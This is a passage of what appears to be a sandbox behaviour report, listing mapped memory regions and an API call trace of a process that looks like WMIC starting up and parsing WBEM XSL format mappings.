	              id = 2366
	        start_va = 0x71140000
	          end_va = 0x7134cfff
	       monitored = 0
	     entry_point = 0x7122acb0
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 2367
	        start_va = 0x76c00000
	          end_va = 0x76ceafff
	       monitored = 0
	     entry_point = 0x76c3d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 2374
	        start_va = 0x73c40000
	          end_va = 0x73cb4fff
	       monitored = 0
	     entry_point = 0x73c79a60
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")

Region:
	              id = 2375
	        start_va = 0x6d0000
	          end_va = 0x75ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 2384
	        start_va = 0x75f60000
	          end_va = 0x7607efff
	       monitored = 0
	     entry_point = 0x75fa5980
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")

Region:
	              id = 2385
	        start_va = 0x5e0000
	          end_va = 0x5e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005e0000"
	        filename = ""

Region:
	              id = 2386
	        start_va = 0x6880000
	          end_va = 0x693bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006880000"
	        filename = ""

Region:
	              id = 2387
	        start_va = 0x5e0000
	          end_va = 0x5e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005e0000"
	        filename = ""

Region:
	              id = 2388
	        start_va = 0x73c20000
	          end_va = 0x73c3cfff
	       monitored = 0
	     entry_point = 0x73c23b10
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")

Region:
	              id = 2414
	        start_va = 0x610000
	          end_va = 0x64ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 2415
	        start_va = 0x660000
	          end_va = 0x66ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000660000"
	        filename = ""

Region:
	              id = 2416
	        start_va = 0x670000
	          end_va = 0x6affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000670000"
	        filename = ""

Region:
	              id = 2431
	        start_va = 0x6d0000
	          end_va = 0x70ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 2432
	        start_va = 0x710000
	          end_va = 0x74ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000710000"
	        filename = ""

Region:
	              id = 2433
	        start_va = 0x750000
	          end_va = 0x75ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000750000"
	        filename = ""

Region:
	              id = 2434
	        start_va = 0xba0000
	          end_va = 0xbdffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ba0000"
	        filename = ""

Region:
	              id = 2435
	        start_va = 0xbe0000
	          end_va = 0xc1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000be0000"
	        filename = ""

Region:
	              id = 2436
	        start_va = 0x6940000
	          end_va = 0x697ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006940000"
	        filename = ""

Region:
	              id = 2437
	        start_va = 0x6980000
	          end_va = 0x69bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006980000"
	        filename = ""

Region:
	              id = 2546
	        start_va = 0x6f2a0000
	          end_va = 0x6f2affff
	       monitored = 0
	     entry_point = 0x6f2a6ab2
	     region_type = mapped_file
	            name = "msoxmlmf.dll"
	        filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msoxmlmf.dll")

Region:
	              id = 2547
	        start_va = 0x6f280000
	          end_va = 0x6f293fff
	       monitored = 0
	     entry_point = 0x6f28e290
	     region_type = mapped_file
	            name = "vcruntime140.dll"
	        filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll")

Region:
	              id = 2548
	        start_va = 0x6f190000
	          end_va = 0x6f270fff
	       monitored = 0
	     entry_point = 0x6f1be6b0
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll")

Region:
	              id = 2561
	        start_va = 0x69c0000
	          end_va = 0x6aa0fff
	       monitored = 0
	     entry_point = 0x69ee6b0
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll")

Region:
	              id = 2562
	        start_va = 0x5f0000
	          end_va = 0x5f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005f0000"
	        filename = ""

Region:
	              id = 2563
	        start_va = 0x650000
	          end_va = 0x650fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 2586
	        start_va = 0x6ab0000
	          end_va = 0x6baffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006ab0000"
	        filename = ""

Region:
	              id = 3060
	        start_va = 0x6f620000
	          end_va = 0x6f630fff
	       monitored = 0
	     entry_point = 0x6f628fa0
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll")

Region:
	              id = 3063
	        start_va = 0x6f560000
	          end_va = 0x6f61efff
	       monitored = 0
	     entry_point = 0x6f591e80
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll")

Region:
	              id = 3195
	        start_va = 0x6b0000
	          end_va = 0x6bcfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006b0000"
	        filename = ""

Region:
	              id = 4287
	        start_va = 0x6f500000
	          end_va = 0x6f51bfff
	       monitored = 0
	     entry_point = 0x6f50aa90
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll")

Region:
	              id = 4288
	        start_va = 0x6b0000
	          end_va = 0x6b4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wmiutils.dll.mui"
	        filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui")


Thread:
	id = 68
	os_tid = 0xfd4

	[0237.452] GetModuleHandleA (lpModuleName=0x0) returned 0x1010000
	[0237.452] __set_app_type (_Type=0x1) 
	[0237.453] __p__fmode () returned 0x768d4d6c
	[0237.453] __p__commode () returned 0x768d5b1c
	[0237.453] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x104aa90) returned 0x0
	[0237.453] __wgetmainargs (in: _Argc=0x10591a8, _Argv=0x10591ac, _Env=0x10591b0, _DoWildCard=0, _StartInfo=0x10591bc | out: _Argc=0x10591a8, _Argv=0x10591ac, _Env=0x10591b0) returned 0
	[0237.462] ??0CHString@@QAE@XZ () returned 0x10595ec
	[0237.467] malloc (_Size=0x18) returned 0x771040
	[0237.467] malloc (_Size=0x38) returned 0x771060
	[0237.467] malloc (_Size=0x28) returned 0x7710a0
	[0237.467] malloc (_Size=0x18) returned 0x7710d0
	[0237.467] malloc (_Size=0x24) returned 0x7710f0
	[0237.471] malloc (_Size=0x18) returned 0x771120
	[0237.471] malloc (_Size=0x18) returned 0x771140
	[0237.471] ??0CHString@@QAE@XZ () returned 0x10598fc
	[0237.471] malloc (_Size=0x18) returned 0x771160
	[0237.471] ?Empty@CHString@@QAEXXZ () returned 0x6f886260
	[0237.471] SetConsoleCtrlHandler (HandlerRoutine=0x1044980, Add=1) returned 1
	[0237.471] _onexit (_Func=0x1050a20) returned 0x1050a20
	[0237.472] _onexit (_Func=0x1050a30) returned 0x1050a30
	[0237.472] _onexit (_Func=0x1050a50) returned 0x1050a50
	[0237.473] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0237.473] ResolveDelayLoadedAPI () returned 0x73f288d0
	[0237.474] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0237.489] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0247.017] CoCreateInstance (in: rclsid=0x1016a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1016a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1059510 | out: ppv=0x1059510*=0x462a00) returned 0x0
	[0247.552] GetCurrentProcess () returned 0xffffffff
	[0247.552] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcf734 | out: TokenHandle=0xcf734*=0x154) returned 1
	[0247.552] GetTokenInformation (in: TokenHandle=0x154, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf730 | out: TokenInformation=0x0, ReturnLength=0xcf730) returned 0
	[0247.552] malloc (_Size=0x118) returned 0x773be8
	[0247.552] GetTokenInformation (in: TokenHandle=0x154, TokenInformationClass=0x3, TokenInformation=0x773be8, TokenInformationLength=0x118, ReturnLength=0xcf730 | out: TokenInformation=0x773be8, ReturnLength=0xcf730) returned 1
	[0247.553] AdjustTokenPrivileges (in: TokenHandle=0x154, DisableAllPrivileges=0, NewState=0x773be8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0247.553] free (_Block=0x773be8) 
	[0247.554] CloseHandle (hObject=0x154) returned 1
	[0247.554] malloc (_Size=0x40) returned 0x773be8
	[0247.554] malloc (_Size=0x40) returned 0x773c30
	[0247.554] malloc (_Size=0x40) returned 0x773c78
	[0247.554] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0247.853] _vsnwprintf (in: _Buffer=0x773c78, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcf6bc | out: _Buffer="ms_409") returned 6
	[0247.854] malloc (_Size=0x20) returned 0x773cc0
	[0247.855] GetComputerNameW (in: lpBuffer=0x773cc0, nSize=0xcf720 | out: lpBuffer="XC64ZB", nSize=0xcf720) returned 1
	[0247.855] lstrlenW (lpString="XC64ZB") returned 6
	[0247.855] malloc (_Size=0xe) returned 0x771208
	[0247.855] lstrlenW (lpString="XC64ZB") returned 6
	[0247.855] ResolveDelayLoadedAPI () returned 0x73d7c5f0
	[0247.856] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcf734 | out: lpNameBuffer=0x0, nSize=0xcf734) returned 0x0
	[0247.860] GetLastError () returned 0xea
	[0247.861] malloc (_Size=0x2a) returned 0x773ce8
	[0247.861] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x773ce8, nSize=0xcf734 | out: lpNameBuffer="XC64ZB\\RDhJ0CNFevzX", nSize=0xcf734) returned 0x1
	[0247.862] lstrlenW (lpString="") returned 0
	[0247.862] lstrlenW (lpString="XC64ZB") returned 6
	[0247.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XC64ZB", cchCount1=6, lpString2="", cchCount2=0) returned 3
	[0247.866] lstrlenW (lpString=".") returned 1
	[0247.867] lstrlenW (lpString="XC64ZB") returned 6
	[0247.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XC64ZB", cchCount1=6, lpString2=".", cchCount2=1) returned 3
	[0247.867] lstrlenW (lpString="LOCALHOST") returned 9
	[0247.867] lstrlenW (lpString="XC64ZB") returned 6
	[0247.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XC64ZB", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3
	[0247.867] lstrlenW (lpString="XC64ZB") returned 6
	[0247.867] lstrlenW (lpString="XC64ZB") returned 6
	[0247.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XC64ZB", cchCount1=6, lpString2="XC64ZB", cchCount2=6) returned 2
	[0247.867] free (_Block=0x771208) 
	[0247.867] lstrlenW (lpString="XC64ZB") returned 6
	[0247.867] malloc (_Size=0xe) returned 0x771208
	[0247.868] lstrlenW (lpString="XC64ZB") returned 6
	[0247.868] lstrlenW (lpString="XC64ZB") returned 6
	[0247.868] malloc (_Size=0xe) returned 0x773d20
	[0247.868] lstrlenW (lpString="XC64ZB") returned 6
	[0247.868] malloc (_Size=0x4) returned 0x773d38
	[0247.868] malloc (_Size=0xc) returned 0x773d48
	[0247.868] ResolveDelayLoadedAPI () returned 0x76d09c90
	[0247.945] malloc (_Size=0x18) returned 0x773de8
	[0247.945] malloc (_Size=0xc) returned 0x773e08
	[0247.945] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0247.945] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0247.945] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0247.945] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0247.945] malloc (_Size=0x18) returned 0x773e20
	[0247.945] malloc (_Size=0xc) returned 0x773e40
	[0247.946] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0247.946] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0247.946] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0247.946] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0247.946] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0247.946] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0247.946] malloc (_Size=0x18) returned 0x773e58
	[0247.946] malloc (_Size=0xc) returned 0x773e78
	[0247.946] SysStringLen (param_1="DELEGATE") returned 0x8
	[0247.946] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0247.946] SysStringLen (param_1="DELEGATE") returned 0x8
	[0247.946] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0247.946] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0247.947] SysStringLen (param_1="DELEGATE") returned 0x8
	[0247.947] malloc (_Size=0x18) returned 0x773e90
	[0247.947] malloc (_Size=0xc) returned 0x773eb0
	[0247.947] malloc (_Size=0x18) returned 0x773ec8
	[0247.947] malloc (_Size=0xc) returned 0x773ee8
	[0247.948] SysStringLen (param_1="NONE") returned 0x4
	[0247.948] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.948] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.948] SysStringLen (param_1="NONE") returned 0x4
	[0247.948] malloc (_Size=0x18) returned 0x773f00
	[0247.948] malloc (_Size=0xc) returned 0x773f20
	[0247.948] SysStringLen (param_1="CONNECT") returned 0x7
	[0247.948] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.948] malloc (_Size=0x18) returned 0x773f38
	[0247.948] malloc (_Size=0xc) returned 0x773f58
	[0247.949] SysStringLen (param_1="CALL") returned 0x4
	[0247.949] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.949] SysStringLen (param_1="CALL") returned 0x4
	[0247.949] SysStringLen (param_1="CONNECT") returned 0x7
	[0247.949] malloc (_Size=0x18) returned 0x773f70
	[0247.949] malloc (_Size=0xc) returned 0x7704a0
	[0247.950] SysStringLen (param_1="PKT") returned 0x3
	[0247.950] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.951] SysStringLen (param_1="PKT") returned 0x3
	[0247.951] SysStringLen (param_1="NONE") returned 0x4
	[0247.951] SysStringLen (param_1="NONE") returned 0x4
	[0247.951] SysStringLen (param_1="PKT") returned 0x3
	[0247.951] malloc (_Size=0x18) returned 0x7704b8
	[0247.951] malloc (_Size=0xc) returned 0x7704d8
	[0247.951] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0247.951] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.951] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0247.951] SysStringLen (param_1="NONE") returned 0x4
	[0247.951] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0247.951] SysStringLen (param_1="PKT") returned 0x3
	[0247.951] SysStringLen (param_1="PKT") returned 0x3
	[0247.951] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0247.952] malloc (_Size=0x18) returned 0x772378
	[0247.952] malloc (_Size=0xc) returned 0x7704f0
	[0247.952] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0247.952] SysStringLen (param_1="DEFAULT") returned 0x7
	[0247.952] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0247.952] SysStringLen (param_1="PKT") returned 0x3
	[0247.952] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0247.952] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0247.952] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0247.952] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0247.952] malloc (_Size=0x18) returned 0x772618
	[0247.953] malloc (_Size=0x40) returned 0x770508
	[0247.953] malloc (_Size=0x20a) returned 0x772b38
	[0247.953] GetSystemDirectoryW (in: lpBuffer=0x772b38, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0247.953] free (_Block=0x772b38) 
	[0247.954] malloc (_Size=0xc) returned 0x770550
	[0247.954] malloc (_Size=0xc) returned 0x770568
	[0247.954] malloc (_Size=0xc) returned 0x772c38
	[0247.954] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
	[0247.954] SysStringLen (param_1="\\wbem\\") returned 0x6
	[0247.954] memcpy (in: _Dst=0x479414, _Src=0x46fa0c, _Size=0x28 | out: _Dst=0x479414) returned 0x479414
	[0247.954] memcpy (in: _Dst=0x47943a, _Src=0x47354c, _Size=0xe | out: _Dst=0x47943a) returned 0x47943a
	[0247.954] free (_Block=0x770550) 
	[0247.955] free (_Block=0x770568) 
	[0247.955] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
	[0247.955] free (_Block=0x772c38) 
	[0247.955] malloc (_Size=0xc) returned 0x772ba8
	[0247.955] malloc (_Size=0xc) returned 0x772c20
	[0247.955] malloc (_Size=0xc) returned 0x772ce0
	[0247.955] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
	[0247.955] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
	[0247.955] memcpy (in: _Dst=0x4760e4, _Src=0x47957c, _Size=0x34 | out: _Dst=0x4760e4) returned 0x4760e4
	[0247.955] memcpy (in: _Dst=0x476116, _Src=0x46fa0c, _Size=0x22 | out: _Dst=0x476116) returned 0x476116
	[0247.956] free (_Block=0x772ba8) 
	[0247.956] free (_Block=0x772c20) 
	[0247.956] GetCurrentThreadId () returned 0xfd4
	[0247.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf244 | out: phkResult=0xcf244*=0x160) returned 0x0
	[0247.956] RegQueryValueExW (in: hKey=0x160, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf250, lpcbData=0xcf24c*=0x400 | out: lpType=0x0, lpData=0xcf250*=0x30, lpcbData=0xcf24c*=0x4) returned 0x0
	[0247.956] _wcsicmp (_String1="0", _String2="1") returned -1
	[0247.956] _wcsicmp (_String1="0", _String2="2") returned -2
	[0247.956] RegQueryValueExW (in: hKey=0x160, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf24c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf24c*=0x42) returned 0x0
	[0247.957] malloc (_Size=0x86) returned 0x772d40
	[0247.957] RegQueryValueExW (in: hKey=0x160, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x772d40, lpcbData=0xcf24c*=0x42 | out: lpType=0x0, lpData=0x772d40*=0x25, lpcbData=0xcf24c*=0x42) returned 0x0
	[0247.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0247.957] malloc (_Size=0x42) returned 0x770550
	[0247.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0247.957] RegQueryValueExW (in: hKey=0x160, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf250, lpcbData=0xcf24c*=0x400 | out: lpType=0x0, lpData=0xcf250*=0x36, lpcbData=0xcf24c*=0xc) returned 0x0
	[0247.957] _wtol (_String="65536") returned 65536
	[0247.958] free (_Block=0x772d40) 
	[0247.958] RegCloseKey (hKey=0x0) returned 0x6
	[0247.958] CoCreateInstance (in: rclsid=0x1016a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1016a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcf6e4 | out: ppv=0xcf6e4*=0xc845a8) returned 0x0
	[0248.649] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0xc845a8, xmlSource=0xcf664*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xcf6c8 | out: isSuccessful=0xcf6c8*=0xffff) returned 0x0
	[0252.528] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xc845a8, DOMElement=0xcf6dc | out: DOMElement=0xcf6dc*=0xc86b48) returned 0x0
	[0252.530] malloc (_Size=0xc) returned 0x772c08
	[0252.531] IXMLDOMElement:getElementsByTagName (in: This=0xc86b48, tagName="XSLFORMAT", resultList=0xcf6d8 | out: resultList=0xcf6d8*=0xc89ca0) returned 0x0
	[0252.539] free (_Block=0x772c08) 
	[0252.539] IXMLDOMNodeList:get_length (in: This=0xc89ca0, listLength=0xcf6d0 | out: listLength=0xcf6d0*=21) returned 0x0
	[0252.543] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=0, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.544] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.545] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.545] malloc (_Size=0xc) returned 0x772d10
	[0252.546] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.546] free (_Block=0x772d10) 
	[0252.546] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0
	[0252.546] malloc (_Size=0xc) returned 0x772cf8
	[0252.546] malloc (_Size=0xc) returned 0x772c20
	[0252.546] malloc (_Size=0x18) returned 0x7723b8
	[0252.547] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.547] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.547] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.547] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=1, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.548] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="textvaluelist.xsl") returned 0x0
	[0252.548] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.548] malloc (_Size=0xc) returned 0x772c50
	[0252.667] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.667] free (_Block=0x772c50) 
	[0252.667] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0
	[0252.667] malloc (_Size=0xc) returned 0x772d10
	[0252.667] malloc (_Size=0xc) returned 0x772c80
	[0252.668] SysStringLen (param_1="VALUE") returned 0x5
	[0252.668] SysStringLen (param_1="TABLE") returned 0x5
	[0252.668] SysStringLen (param_1="TABLE") returned 0x5
	[0252.668] SysStringLen (param_1="VALUE") returned 0x5
	[0252.668] malloc (_Size=0x18) returned 0x772458
	[0252.668] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.668] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.668] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.668] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=2, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.669] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="textvaluelist.xsl") returned 0x0
	[0252.669] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.669] malloc (_Size=0xc) returned 0x772c68
	[0252.669] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.669] free (_Block=0x772c68) 
	[0252.670] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0
	[0252.670] malloc (_Size=0xc) returned 0x772d28
	[0252.670] malloc (_Size=0xc) returned 0x772c50
	[0252.670] SysStringLen (param_1="LIST") returned 0x4
	[0252.670] SysStringLen (param_1="TABLE") returned 0x5
	[0252.670] malloc (_Size=0x18) returned 0x772678
	[0252.670] IUnknown:Release (This=0xc86b88) returned 0x0
